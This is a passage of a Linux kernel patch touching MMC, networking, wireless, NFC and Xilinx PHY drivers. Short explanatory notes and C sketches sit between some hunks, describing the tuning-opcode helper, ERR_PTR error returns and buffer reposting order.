+ 		msdc_request_done(host, mrq);
+ 	else if (cmd == mrq->sbc)
+diff --git a/drivers/mmc/host/sdhci-msm.c b/drivers/mmc/host/sdhci-msm.c
+index e37fb25577c0f..28bd562c439ef 100644
+--- a/drivers/mmc/host/sdhci-msm.c
++++ b/drivers/mmc/host/sdhci-msm.c
+@@ -2218,8 +2218,7 @@ static int __sdhci_msm_check_write(struct sdhci_host *host, u16 val, int reg)
+ 		if (!msm_host->use_cdr)
+ 			break;
+ 		if ((msm_host->transfer_mode & SDHCI_TRNS_READ) &&
+-		    SDHCI_GET_CMD(val) != MMC_SEND_TUNING_BLOCK_HS200 &&
+-		    SDHCI_GET_CMD(val) != MMC_SEND_TUNING_BLOCK)
++		    !mmc_op_tuning(SDHCI_GET_CMD(val)))
+ 			sdhci_msm_set_cdr(host, true);
+ 		else
+ 			sdhci_msm_set_cdr(host, false);
+diff --git a/drivers/mmc/host/sdhci-pci-o2micro.c b/drivers/mmc/host/sdhci-pci-o2micro.c
+index 24bb0e9809e76..cfa0956e7d72a 100644
+--- a/drivers/mmc/host/sdhci-pci-o2micro.c
++++ b/drivers/mmc/host/sdhci-pci-o2micro.c
+@@ -326,8 +326,7 @@ static int sdhci_o2_execute_tuning(struct mmc_host *mmc, u32 opcode)
+ 		(host->timing != MMC_TIMING_UHS_SDR50))
+ 		return sdhci_execute_tuning(mmc, opcode);
+ 
+-	if (WARN_ON((opcode != MMC_SEND_TUNING_BLOCK_HS200) &&
+-			(opcode != MMC_SEND_TUNING_BLOCK)))
++	if (WARN_ON(!mmc_op_tuning(opcode)))
+ 		return -EINVAL;
+ 
+ 	/* Force power mode enter L0 */
+diff --git a/drivers/mmc/host/sdhci-tegra.c b/drivers/mmc/host/sdhci-tegra.c
+index 1adaa94c31aca..62d236bfe9377 100644
+--- a/drivers/mmc/host/sdhci-tegra.c
++++ b/drivers/mmc/host/sdhci-tegra.c
+@@ -268,13 +268,9 @@ static void tegra210_sdhci_writew(struct sdhci_host *host, u16 val, int reg)
+ {
+ 	bool is_tuning_cmd = 0;
+ 	bool clk_enabled;
+-	u8 cmd;
+ 
+-	if (reg == SDHCI_COMMAND) {
+-		cmd = SDHCI_GET_CMD(val);
+-		is_tuning_cmd = cmd == MMC_SEND_TUNING_BLOCK ||
+-				cmd == MMC_SEND_TUNING_BLOCK_HS200;
+-	}
++	if (reg == SDHCI_COMMAND)
++		is_tuning_cmd = mmc_op_tuning(SDHCI_GET_CMD(val));
+ 
+ 	if (is_tuning_cmd)
+ 		clk_enabled = tegra_sdhci_configure_card_clk(host, 0);
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index 4237d8ae878c1..536d21028a116 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -1712,8 +1712,7 @@ static bool sdhci_send_command(struct sdhci_host *host, struct mmc_command *cmd)
+ 		flags |= SDHCI_CMD_INDEX;
+ 
+ 	/* CMD19 is special in that the Data Present Select should be set */
+-	if (cmd->data || cmd->opcode == MMC_SEND_TUNING_BLOCK ||
+-	    cmd->opcode == MMC_SEND_TUNING_BLOCK_HS200)
++	if (cmd->data || mmc_op_tuning(cmd->opcode))
+ 		flags |= SDHCI_CMD_DATA;
+ 
+ 	timeout = jiffies;
+@@ -3396,8 +3395,6 @@ static void sdhci_adma_show_error(struct sdhci_host *host)
+ 
+ static void sdhci_data_irq(struct sdhci_host *host, u32 intmask)
+ {
+-	u32 command;
+-
+ 	/*
+ 	 * CMD19 generates _only_ Buffer Read Ready interrupt if
+ 	 * use sdhci_send_tuning.
+@@ -3406,9 +3403,7 @@ static void sdhci_data_irq(struct sdhci_host *host, u32 intmask)
+ 	 * SDHCI_INT_DATA_AVAIL always there, stuck in irq storm.
+ 	 */
+ 	if (intmask & SDHCI_INT_DATA_AVAIL && !host->data) {
+-		command = SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND));
+-		if (command == MMC_SEND_TUNING_BLOCK ||
+-		    command == MMC_SEND_TUNING_BLOCK_HS200) {
++		if (mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND)))) {
+ 			host->tuning_done = 1;
+ 			wake_up(&host->buf_ready_int);
+ 			return;
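Every MMC hunk in this patch collapses the open-coded CMD19/CMD21 opcode pairs into mmc_op_tuning(). The helper lives in include/linux/mmc/mmc.h and is not among the hunks shown here; it presumably amounts to the check below, reproduced as a self-contained userspace sketch:

#include <stdbool.h>
#include <stdint.h>

/* Tuning commands: CMD19 (SD/UHS-I) and CMD21 (eMMC HS200/HS400) */
#define MMC_SEND_TUNING_BLOCK		19
#define MMC_SEND_TUNING_BLOCK_HS200	21

static inline bool mmc_op_tuning(uint32_t opcode)
{
	return opcode == MMC_SEND_TUNING_BLOCK ||
	       opcode == MMC_SEND_TUNING_BLOCK_HS200;
}

Centralizing the predicate keeps the call sites above from drifting apart if another tuning opcode is ever added.
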
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index c218352814430..375412ce1ea5f 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -577,12 +577,47 @@ static void bond_ipsec_del_sa_all(struct bonding *bond)
+ 				   __func__);
+ 		} else {
+ 			slave->dev->xfrmdev_ops->xdo_dev_state_delete(ipsec->xs);
++			if (slave->dev->xfrmdev_ops->xdo_dev_state_free)
++				slave->dev->xfrmdev_ops->xdo_dev_state_free(ipsec->xs);
+ 		}
+ 	}
+ 	spin_unlock_bh(&bond->ipsec_lock);
+ 	rcu_read_unlock();
+ }
+ 
++static void bond_ipsec_free_sa(struct xfrm_state *xs)
++{
++	struct net_device *bond_dev = xs->xso.dev;
++	struct net_device *real_dev;
++	netdevice_tracker tracker;
++	struct bonding *bond;
++	struct slave *slave;
++
++	if (!bond_dev)
++		return;
++
++	rcu_read_lock();
++	bond = netdev_priv(bond_dev);
++	slave = rcu_dereference(bond->curr_active_slave);
++	real_dev = slave ? slave->dev : NULL;
++	netdev_hold(real_dev, &tracker, GFP_ATOMIC);
++	rcu_read_unlock();
++
++	if (!slave)
++		goto out;
++
++	if (!xs->xso.real_dev)
++		goto out;
++
++	WARN_ON(xs->xso.real_dev != real_dev);
++
++	if (real_dev && real_dev->xfrmdev_ops &&
++	    real_dev->xfrmdev_ops->xdo_dev_state_free)
++		real_dev->xfrmdev_ops->xdo_dev_state_free(xs);
++out:
++	netdev_put(real_dev, &tracker);
++}
++
+ /**
+  * bond_ipsec_offload_ok - can this packet use the xfrm hw offload
+  * @skb: current data packet
+@@ -623,6 +658,7 @@ static bool bond_ipsec_offload_ok(struct sk_buff *skb, struct xfrm_state *xs)
+ static const struct xfrmdev_ops bond_xfrmdev_ops = {
+ 	.xdo_dev_state_add = bond_ipsec_add_sa,
+ 	.xdo_dev_state_delete = bond_ipsec_del_sa,
++	.xdo_dev_state_free = bond_ipsec_free_sa,
+ 	.xdo_dev_offload_ok = bond_ipsec_offload_ok,
+ };
+ #endif /* CONFIG_XFRM_OFFLOAD */
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index abdaaf7db4125..ad358c95c0a45 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -49,12 +49,19 @@ static unsigned int igc_tsn_new_flags(struct igc_adapter *adapter)
+ 	return new_flags;
+ }
+ 
++static bool igc_tsn_is_tx_mode_in_tsn(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++
++	return !!(rd32(IGC_TQAVCTRL) & IGC_TQAVCTRL_TRANSMIT_MODE_TSN);
++}
++
+ void igc_tsn_adjust_txtime_offset(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
+ 	u16 txoffset;
+ 
+-	if (!is_any_launchtime(adapter))
++	if (!igc_tsn_is_tx_mode_in_tsn(adapter))
+ 		return;
+ 
+ 	switch (adapter->link_speed) {
+diff --git a/drivers/net/ethernet/microsoft/mana/hw_channel.c b/drivers/net/ethernet/microsoft/mana/hw_channel.c
+index 543a5d5c304f3..66a0552fc8b3a 100644
+--- a/drivers/net/ethernet/microsoft/mana/hw_channel.c
++++ b/drivers/net/ethernet/microsoft/mana/hw_channel.c
+@@ -51,9 +51,33 @@ static int mana_hwc_verify_resp_msg(const struct hwc_caller_ctx *caller_ctx,
+ 	return 0;
+ }
+ 
++static int mana_hwc_post_rx_wqe(const struct hwc_wq *hwc_rxq,
++				struct hwc_work_request *req)
++{
++	struct device *dev = hwc_rxq->hwc->dev;
++	struct gdma_sge *sge;
++	int err;
++
++	sge = &req->sge;
++	sge->address = (u64)req->buf_sge_addr;
++	sge->mem_key = hwc_rxq->msg_buf->gpa_mkey;
++	sge->size = req->buf_len;
++
++	memset(&req->wqe_req, 0, sizeof(struct gdma_wqe_request));
++	req->wqe_req.sgl = sge;
++	req->wqe_req.num_sge = 1;
++	req->wqe_req.client_data_unit = 0;
++
++	err = mana_gd_post_and_ring(hwc_rxq->gdma_wq, &req->wqe_req, NULL);
++	if (err)
++		dev_err(dev, "Failed to post WQE on HWC RQ: %d\n", err);
++	return err;
++}
++
+ static void mana_hwc_handle_resp(struct hw_channel_context *hwc, u32 resp_len,
+-				 const struct gdma_resp_hdr *resp_msg)
++				 struct hwc_work_request *rx_req)
+ {
++	const struct gdma_resp_hdr *resp_msg = rx_req->buf_va;
+ 	struct hwc_caller_ctx *ctx;
+ 	int err;
+ 
+@@ -61,6 +85,7 @@ static void mana_hwc_handle_resp(struct hw_channel_context *hwc, u32 resp_len,
+ 		      hwc->inflight_msg_res.map)) {
+ 		dev_err(hwc->dev, "hwc_rx: invalid msg_id = %u\n",
+ 			resp_msg->response.hwc_msg_id);
++		mana_hwc_post_rx_wqe(hwc->rxq, rx_req);
+ 		return;
+ 	}
+ 
+@@ -74,30 +99,13 @@ static void mana_hwc_handle_resp(struct hw_channel_context *hwc, u32 resp_len,
+ 	memcpy(ctx->output_buf, resp_msg, resp_len);
+ out:
+ 	ctx->error = err;
+-	complete(&ctx->comp_event);
+-}
+-
+-static int mana_hwc_post_rx_wqe(const struct hwc_wq *hwc_rxq,
+-				struct hwc_work_request *req)
+-{
+-	struct device *dev = hwc_rxq->hwc->dev;
+-	struct gdma_sge *sge;
+-	int err;
+-
+-	sge = &req->sge;
+-	sge->address = (u64)req->buf_sge_addr;
+-	sge->mem_key = hwc_rxq->msg_buf->gpa_mkey;
+-	sge->size = req->buf_len;
+ 
+-	memset(&req->wqe_req, 0, sizeof(struct gdma_wqe_request));
+-	req->wqe_req.sgl = sge;
+-	req->wqe_req.num_sge = 1;
+-	req->wqe_req.client_data_unit = 0;
++	/* Must post rx wqe before complete(), otherwise the next rx may
++	 * hit no_wqe error.
++	 */
++	mana_hwc_post_rx_wqe(hwc->rxq, rx_req);
+ 
+-	err = mana_gd_post_and_ring(hwc_rxq->gdma_wq, &req->wqe_req, NULL);
+-	if (err)
+-		dev_err(dev, "Failed to post WQE on HWC RQ: %d\n", err);
+-	return err;
++	complete(&ctx->comp_event);
+ }
+ 
+ static void mana_hwc_init_event_handler(void *ctx, struct gdma_queue *q_self,
+@@ -216,14 +224,12 @@ static void mana_hwc_rx_event_handler(void *ctx, u32 gdma_rxq_id,
+ 		return;
+ 	}
+ 
+-	mana_hwc_handle_resp(hwc, rx_oob->tx_oob_data_size, resp);
++	mana_hwc_handle_resp(hwc, rx_oob->tx_oob_data_size, rx_req);
+ 
+-	/* Do no longer use 'resp', because the buffer is posted to the HW
+-	 * in the below mana_hwc_post_rx_wqe().
++	/* Can no longer use 'resp', because the buffer is posted to the HW
++	 * in mana_hwc_handle_resp() above.
+ 	 */
+ 	resp = NULL;
+-
+-	mana_hwc_post_rx_wqe(hwc_rxq, rx_req);
+ }
+ 
+ static void mana_hwc_tx_event_handler(void *ctx, u32 gdma_txq_id,
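The hw_channel reordering is purely about sequencing: the response buffer must be back on the receive queue before complete() can wake a caller that may immediately send the next request. A schematic of the fixed order (all names here are invented for the sketch, not the driver's API):

static void handle_resp(struct hwc *hwc, struct work_request *rx_req)
{
	copy_to_caller(hwc, rx_req);  /* 1. consume the buffer       */
	post_rx_wqe(hwc, rx_req);     /* 2. return it to the HW RQ   */
	complete(&hwc->caller_done);  /* 3. only now wake the caller */
}
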
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 512daeb14e28b..bbe8d76b1595e 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1219,7 +1219,7 @@ static struct sock *gtp_encap_enable_socket(int fd, int type,
+ 	sock = sockfd_lookup(fd, &err);
+ 	if (!sock) {
+ 		pr_debug("gtp socket fd=%d not found\n", fd);
+-		return NULL;
++		return ERR_PTR(err);
+ 	}
+ 
+ 	sk = sock->sk;
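gtp_encap_enable_socket() now propagates the sockfd_lookup() error as ERR_PTR(err) instead of collapsing every failure to NULL, so callers can report the actual errno. A userspace re-creation of the ERR_PTR/IS_ERR/PTR_ERR idiom from include/linux/err.h (lookup() and its values are invented for the demo):

#include <stdio.h>
#include <errno.h>
#include <stdbool.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long error)      { return (void *)error; }
static inline long  PTR_ERR(const void *ptr) { return (long)ptr; }

static inline bool IS_ERR(const void *ptr)
{
	/* errors live in the top 4095 values of the address space */
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

static void *lookup(int fd)
{
	if (fd < 0)
		return ERR_PTR(-EBADF); /* encode the cause, not NULL */
	return "socket";
}

int main(void)
{
	void *sk = lookup(-1);

	if (IS_ERR(sk))
		printf("lookup failed: %ld\n", PTR_ERR(sk)); /* -9 */
	return 0;
}
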
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index 235963e1d7a9a..c96dfd7fd3dc8 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -825,22 +825,25 @@ int iwl_sar_get_wgds_table(struct iwl_fw_runtime *fwrt)
+ 				entry = &wifi_pkg->package.elements[entry_idx];
+ 				entry_idx++;
+ 				if (entry->type != ACPI_TYPE_INTEGER ||
+-				    entry->integer.value > num_profiles) {
++				    entry->integer.value > num_profiles ||
++				    entry->integer.value <
++					rev_data[idx].min_profiles) {
+ 					ret = -EINVAL;
+ 					goto out_free;
+ 				}
+-				num_profiles = entry->integer.value;
+ 
+ 				/*
+-				 * this also validates >= min_profiles since we
+-				 * otherwise wouldn't have gotten the data when
+-				 * looking up in ACPI
++				 * Check to see if we received package count
++				 * same as max # of profiles
+ 				 */
+ 				if (wifi_pkg->package.count !=
+ 				    hdr_size + profile_size * num_profiles) {
+ 					ret = -EINVAL;
+ 					goto out_free;
+ 				}
++
++				/* Number of valid profiles */
++				num_profiles = entry->integer.value;
+ 			}
+ 			goto read_table;
+ 		}
+diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+index d1b23dba5ad50..3cde6fc3bb813 100644
+--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
++++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+@@ -4362,11 +4362,27 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter)
+ 	if (ISSUPP_ADHOC_ENABLED(adapter->fw_cap_info))
+ 		wiphy->interface_modes |= BIT(NL80211_IFTYPE_ADHOC);
+ 
+-	wiphy->bands[NL80211_BAND_2GHZ] = &mwifiex_band_2ghz;
+-	if (adapter->config_bands & BAND_A)
+-		wiphy->bands[NL80211_BAND_5GHZ] = &mwifiex_band_5ghz;
+-	else
++	wiphy->bands[NL80211_BAND_2GHZ] = devm_kmemdup(adapter->dev,
++						       &mwifiex_band_2ghz,
++						       sizeof(mwifiex_band_2ghz),
++						       GFP_KERNEL);
++	if (!wiphy->bands[NL80211_BAND_2GHZ]) {
++		ret = -ENOMEM;
++		goto err;
++	}
++
++	if (adapter->config_bands & BAND_A) {
++		wiphy->bands[NL80211_BAND_5GHZ] = devm_kmemdup(adapter->dev,
++							       &mwifiex_band_5ghz,
++							       sizeof(mwifiex_band_5ghz),
++							       GFP_KERNEL);
++		if (!wiphy->bands[NL80211_BAND_5GHZ]) {
++			ret = -ENOMEM;
++			goto err;
++		}
++	} else {
+ 		wiphy->bands[NL80211_BAND_5GHZ] = NULL;
++	}
+ 
+ 	if (adapter->drcs_enabled && ISSUPP_DRCS_ENABLED(adapter->fw_cap_info))
+ 		wiphy->iface_combinations = &mwifiex_iface_comb_ap_sta_drcs;
+@@ -4459,8 +4475,7 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter)
+ 	if (ret < 0) {
+ 		mwifiex_dbg(adapter, ERROR,
+ 			    "%s: wiphy_register failed: %d\n", __func__, ret);
+-		wiphy_free(wiphy);
+-		return ret;
++		goto err;
+ 	}
+ 
+ 	if (!adapter->regd) {
+@@ -4502,4 +4517,9 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter)
+ 
+ 	adapter->wiphy = wiphy;
+ 	return ret;
++
++err:
++	wiphy_free(wiphy);
++
++	return ret;
+ }
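Duplicating the band tables with devm_kmemdup() gives each adapter a private copy whose lifetime is tied to the device, instead of letting every adapter patch the one shared static struct. Minus the device-managed part, the helper is just allocate-and-copy; a minimal userspace approximation (not the kernel implementation):

#include <stdlib.h>
#include <string.h>

/* Like kmemdup(): heap-allocate len bytes and copy src into them.
 * The devm_ variant additionally frees the copy automatically when
 * the owning device is detached.
 */
static void *kmemdup_sketch(const void *src, size_t len)
{
	void *p = malloc(len);

	if (p)
		memcpy(p, src, len);
	return p;
}
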
+diff --git a/drivers/net/wireless/silabs/wfx/sta.c b/drivers/net/wireless/silabs/wfx/sta.c
+index 871667650dbef..048a552e9da1d 100644
+--- a/drivers/net/wireless/silabs/wfx/sta.c
++++ b/drivers/net/wireless/silabs/wfx/sta.c
+@@ -370,8 +370,11 @@ static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ 
+ 	ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
+ 				      skb->len - ieoffset);
+-	if (unlikely(!ptr))
++	if (!ptr) {
++		/* No RSN IE is fine in open networks */
++		ret = 0;
+ 		goto free_skb;
++	}
+ 
+ 	ptr += pairwise_cipher_suite_count_offset;
+ 	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+diff --git a/drivers/nfc/pn533/pn533.c b/drivers/nfc/pn533/pn533.c
+index f0cac19005527..2e0871409926b 100644
+--- a/drivers/nfc/pn533/pn533.c
++++ b/drivers/nfc/pn533/pn533.c
+@@ -1723,6 +1723,11 @@ static int pn533_start_poll(struct nfc_dev *nfc_dev,
+ 	}
+ 
+ 	pn533_poll_create_mod_list(dev, im_protocols, tm_protocols);
++	if (!dev->poll_mod_count) {
++		nfc_err(dev->dev,
++			"Poll mod list is empty\n");
++		return -EINVAL;
++	}
+ 
+ 	/* Do not always start polling from the same modulation */
+ 	get_random_bytes(&rand_mod, sizeof(rand_mod));
+diff --git a/drivers/phy/xilinx/phy-zynqmp.c b/drivers/phy/xilinx/phy-zynqmp.c
+index 9be9535ad7ab7..ac9a9124a36de 100644
+--- a/drivers/phy/xilinx/phy-zynqmp.c
++++ b/drivers/phy/xilinx/phy-zynqmp.c
+@@ -21,6 +21,7 @@
+ #include <linux/of.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
++#include <linux/pm_runtime.h>
+ #include <linux/slab.h>
+ 
+ #include <dt-bindings/phy/phy.h>
+@@ -80,7 +81,8 @@
+ 
+ /* Reference clock selection parameters */
+ #define L0_Ln_REF_CLK_SEL(n)		(0x2860 + (n) * 4)
+-#define L0_REF_CLK_SEL_MASK		0x8f
++#define L0_REF_CLK_LCL_SEL		BIT(7)
++#define L0_REF_CLK_SEL_MASK		0x9f
+ 
+ /* Calibration digital logic parameters */
+ #define L3_TM_CALIB_DIG19		0xec4c
+@@ -165,6 +167,24 @@
+ /* Timeout values */
+ #define TIMEOUT_US			1000
+ 
++/* Lane 0/1/2/3 offset */
++#define DIG_8(n)		((0x4000 * (n)) + 0x1074)
++#define ILL13(n)		((0x4000 * (n)) + 0x1994)
++#define DIG_10(n)		((0x4000 * (n)) + 0x107c)
++#define RST_DLY(n)		((0x4000 * (n)) + 0x19a4)
++#define BYP_15(n)		((0x4000 * (n)) + 0x1038)
++#define BYP_12(n)		((0x4000 * (n)) + 0x102c)
++#define MISC3(n)		((0x4000 * (n)) + 0x19ac)
++#define EQ11(n)			((0x4000 * (n)) + 0x1978)
++
++static u32 save_reg_address[] = {
++	/* Lane 0/1/2/3 Register */
++	DIG_8(0), ILL13(0), DIG_10(0), RST_DLY(0), BYP_15(0), BYP_12(0), MISC3(0), EQ11(0),
++	DIG_8(1), ILL13(1), DIG_10(1), RST_DLY(1), BYP_15(1), BYP_12(1), MISC3(1), EQ11(1),
++	DIG_8(2), ILL13(2), DIG_10(2), RST_DLY(2), BYP_15(2), BYP_12(2), MISC3(2), EQ11(2),
++	DIG_8(3), ILL13(3), DIG_10(3), RST_DLY(3), BYP_15(3), BYP_12(3), MISC3(3), EQ11(3),
++};
++
+ struct xpsgtr_dev;
+ 
+ /**
+@@ -213,6 +233,7 @@ struct xpsgtr_phy {
+  * @tx_term_fix: fix for GT issue
+  * @saved_icm_cfg0: stored value of ICM CFG0 register
+  * @saved_icm_cfg1: stored value of ICM CFG1 register
++ * @saved_regs: registers to be saved/restored during suspend/resume
+  */
+ struct xpsgtr_dev {
+ 	struct device *dev;
+@@ -225,6 +246,7 @@ struct xpsgtr_dev {
+ 	bool tx_term_fix;
+ 	unsigned int saved_icm_cfg0;
+ 	unsigned int saved_icm_cfg1;
++	u32 *saved_regs;
+ };
+ 
+ /*
+@@ -298,6 +320,32 @@ static inline void xpsgtr_clr_set_phy(struct xpsgtr_phy *gtr_phy,
+ 	writel((readl(addr) & ~clr) | set, addr);
+ }
+ 
++/**
++ * xpsgtr_save_lane_regs - Saves registers on suspend
++ * @gtr_dev: pointer to phy controller context structure
++ */
++static void xpsgtr_save_lane_regs(struct xpsgtr_dev *gtr_dev)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(save_reg_address); i++)
++		gtr_dev->saved_regs[i] = xpsgtr_read(gtr_dev,
++						     save_reg_address[i]);
++}
++
++/**
++ * xpsgtr_restore_lane_regs - Restores registers on resume
++ * @gtr_dev: pointer to phy controller context structure
++ */
++static void xpsgtr_restore_lane_regs(struct xpsgtr_dev *gtr_dev)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(save_reg_address); i++)
++		xpsgtr_write(gtr_dev, save_reg_address[i],
++			     gtr_dev->saved_regs[i]);
++}
++
+ /*
+  * Hardware Configuration
+  */
+@@ -349,11 +397,12 @@ static void xpsgtr_configure_pll(struct xpsgtr_phy *gtr_phy)
+ 		       PLL_FREQ_MASK, ssc->pll_ref_clk);
+ 
+ 	/* Enable lane clock sharing, if required */
+-	if (gtr_phy->refclk != gtr_phy->lane) {
+-		/* Lane3 Ref Clock Selection Register */
++	if (gtr_phy->refclk == gtr_phy->lane)
++		xpsgtr_clr_set(gtr_phy->dev, L0_Ln_REF_CLK_SEL(gtr_phy->lane),
++			       L0_REF_CLK_SEL_MASK, L0_REF_CLK_LCL_SEL);
++	else
+ 		xpsgtr_clr_set(gtr_phy->dev, L0_Ln_REF_CLK_SEL(gtr_phy->lane),
+ 			       L0_REF_CLK_SEL_MASK, 1 << gtr_phy->refclk);
+-	}
+ 
+ 	/* SSC step size [7:0] */
+ 	xpsgtr_clr_set_phy(gtr_phy, L0_PLL_SS_STEP_SIZE_0_LSB,
+@@ -572,6 +621,10 @@ static int xpsgtr_phy_init(struct phy *phy)
+ 
+ 	mutex_lock(&gtr_dev->gtr_mutex);
+ 
++	/* Configure and enable the clock when peripheral phy_init call */
++	if (clk_prepare_enable(gtr_dev->clk[gtr_phy->refclk]))
++		goto out;
++
+ 	/* Skip initialization if not required. */
+ 	if (!xpsgtr_phy_init_required(gtr_phy))
+ 		goto out;
+@@ -616,9 +669,13 @@ static int xpsgtr_phy_init(struct phy *phy)
+ static int xpsgtr_phy_exit(struct phy *phy)
+ {
+ 	struct xpsgtr_phy *gtr_phy = phy_get_drvdata(phy);
++	struct xpsgtr_dev *gtr_dev = gtr_phy->dev;
+ 
+ 	gtr_phy->skip_phy_init = false;
+ 
++	/* Ensure that disable clock only, which configure for lane */
++	clk_disable_unprepare(gtr_dev->clk[gtr_phy->refclk]);
++
+ 	return 0;
+ }
+ 
+@@ -821,34 +878,27 @@ static struct phy *xpsgtr_xlate(struct device *dev,
+  * Power Management
+  */
+ 
+-static int __maybe_unused xpsgtr_suspend(struct device *dev)
++static int xpsgtr_runtime_suspend(struct device *dev)
+ {
+ 	struct xpsgtr_dev *gtr_dev = dev_get_drvdata(dev);
+-	unsigned int i;
+ 
+ 	/* Save the snapshot ICM_CFG registers. */
+ 	gtr_dev->saved_icm_cfg0 = xpsgtr_read(gtr_dev, ICM_CFG0);
+ 	gtr_dev->saved_icm_cfg1 = xpsgtr_read(gtr_dev, ICM_CFG1);
+ 
+-	for (i = 0; i < ARRAY_SIZE(gtr_dev->clk); i++)
+-		clk_disable_unprepare(gtr_dev->clk[i]);
++	xpsgtr_save_lane_regs(gtr_dev);
+ 
+ 	return 0;
+ }
+ 
+-static int __maybe_unused xpsgtr_resume(struct device *dev)
++static int xpsgtr_runtime_resume(struct device *dev)
+ {
+ 	struct xpsgtr_dev *gtr_dev = dev_get_drvdata(dev);
+ 	unsigned int icm_cfg0, icm_cfg1;
+ 	unsigned int i;
+ 	bool skip_phy_init;
+-	int err;
+ 
+-	for (i = 0; i < ARRAY_SIZE(gtr_dev->clk); i++) {
+-		err = clk_prepare_enable(gtr_dev->clk[i]);
+-		if (err)
+-			goto err_clk_put;
+-	}
++	xpsgtr_restore_lane_regs(gtr_dev);
+ 
+ 	icm_cfg0 = xpsgtr_read(gtr_dev, ICM_CFG0);
+ 	icm_cfg1 = xpsgtr_read(gtr_dev, ICM_CFG1);
+@@ -869,18 +919,10 @@ static int __maybe_unused xpsgtr_resume(struct device *dev)
+ 		gtr_dev->phys[i].skip_phy_init = skip_phy_init;
+ 
+ 	return 0;
+-
+-err_clk_put:
+-	while (i--)
+-		clk_disable_unprepare(gtr_dev->clk[i]);
+-
+-	return err;
+ }
+ 
+-static const struct dev_pm_ops xpsgtr_pm_ops = {
+-	SET_SYSTEM_SLEEP_PM_OPS(xpsgtr_suspend, xpsgtr_resume)
+-};
+-
++static DEFINE_RUNTIME_DEV_PM_OPS(xpsgtr_pm_ops, xpsgtr_runtime_suspend,
++				 xpsgtr_runtime_resume, NULL);
+ /*
+  * Probe & Platform Driver
+  */
+@@ -888,7 +930,6 @@ static const struct dev_pm_ops xpsgtr_pm_ops = {
+ static int xpsgtr_get_ref_clocks(struct xpsgtr_dev *gtr_dev)
+ {
+ 	unsigned int refclk;
+-	int ret;
+ 
+ 	for (refclk = 0; refclk < ARRAY_SIZE(gtr_dev->refclk_sscs); ++refclk) {
+ 		unsigned long rate;
+@@ -899,19 +940,14 @@ static int xpsgtr_get_ref_clocks(struct xpsgtr_dev *gtr_dev)
+ 		snprintf(name, sizeof(name), "ref%u", refclk);
+ 		clk = devm_clk_get_optional(gtr_dev->dev, name);
+ 		if (IS_ERR(clk)) {
+-			ret = dev_err_probe(gtr_dev->dev, PTR_ERR(clk),
+-					    "Failed to get reference clock %u\n",
+-					    refclk);
+-			goto err_clk_put;
++			return dev_err_probe(gtr_dev->dev, PTR_ERR(clk),
++					     "Failed to get ref clock %u\n",
++					     refclk);
+ 		}
+ 
+ 		if (!clk)
+ 			continue;
+ 
+-		ret = clk_prepare_enable(clk);
+-		if (ret)
+-			goto err_clk_put;
+-
+ 		gtr_dev->clk[refclk] = clk;
+ 
+ 		/*
+@@ -931,18 +967,11 @@ static int xpsgtr_get_ref_clocks(struct xpsgtr_dev *gtr_dev)
+ 			dev_err(gtr_dev->dev,
+ 				"Invalid rate %lu for reference clock %u\n",
+ 				rate, refclk);
+-			ret = -EINVAL;
+-			goto err_clk_put;
++			return -EINVAL;
+ 		}
+ 	}
+ 
+ 	return 0;
+-
+-err_clk_put:
+-	while (refclk--)
+-		clk_disable_unprepare(gtr_dev->clk[refclk]);
+-
+-	return ret;
+ }
+ 
+ static int xpsgtr_probe(struct platform_device *pdev)
+@@ -951,7 +980,6 @@ static int xpsgtr_probe(struct platform_device *pdev)
+ 	struct xpsgtr_dev *gtr_dev;
+ 	struct phy_provider *provider;
+ 	unsigned int port;
+-	unsigned int i;
+ 	int ret;
+ 
+ 	gtr_dev = devm_kzalloc(&pdev->dev, sizeof(*gtr_dev), GFP_KERNEL);
+@@ -991,8 +1019,7 @@ static int xpsgtr_probe(struct platform_device *pdev)
+ 		phy = devm_phy_create(&pdev->dev, np, &xpsgtr_phyops);
+ 		if (IS_ERR(phy)) {
+ 			dev_err(&pdev->dev, "failed to create PHY\n");
+-			ret = PTR_ERR(phy);
+-			goto err_clk_put;
++			return PTR_ERR(phy);
+ 		}
+ 
+ 		gtr_phy->phy = phy;
+@@ -1003,16 +1030,36 @@ static int xpsgtr_probe(struct platform_device *pdev)
+ 	provider = devm_of_phy_provider_register(&pdev->dev, xpsgtr_xlate);
+ 	if (IS_ERR(provider)) {
+ 		dev_err(&pdev->dev, "registering provider failed\n");
+-		ret = PTR_ERR(provider);
+-		goto err_clk_put;
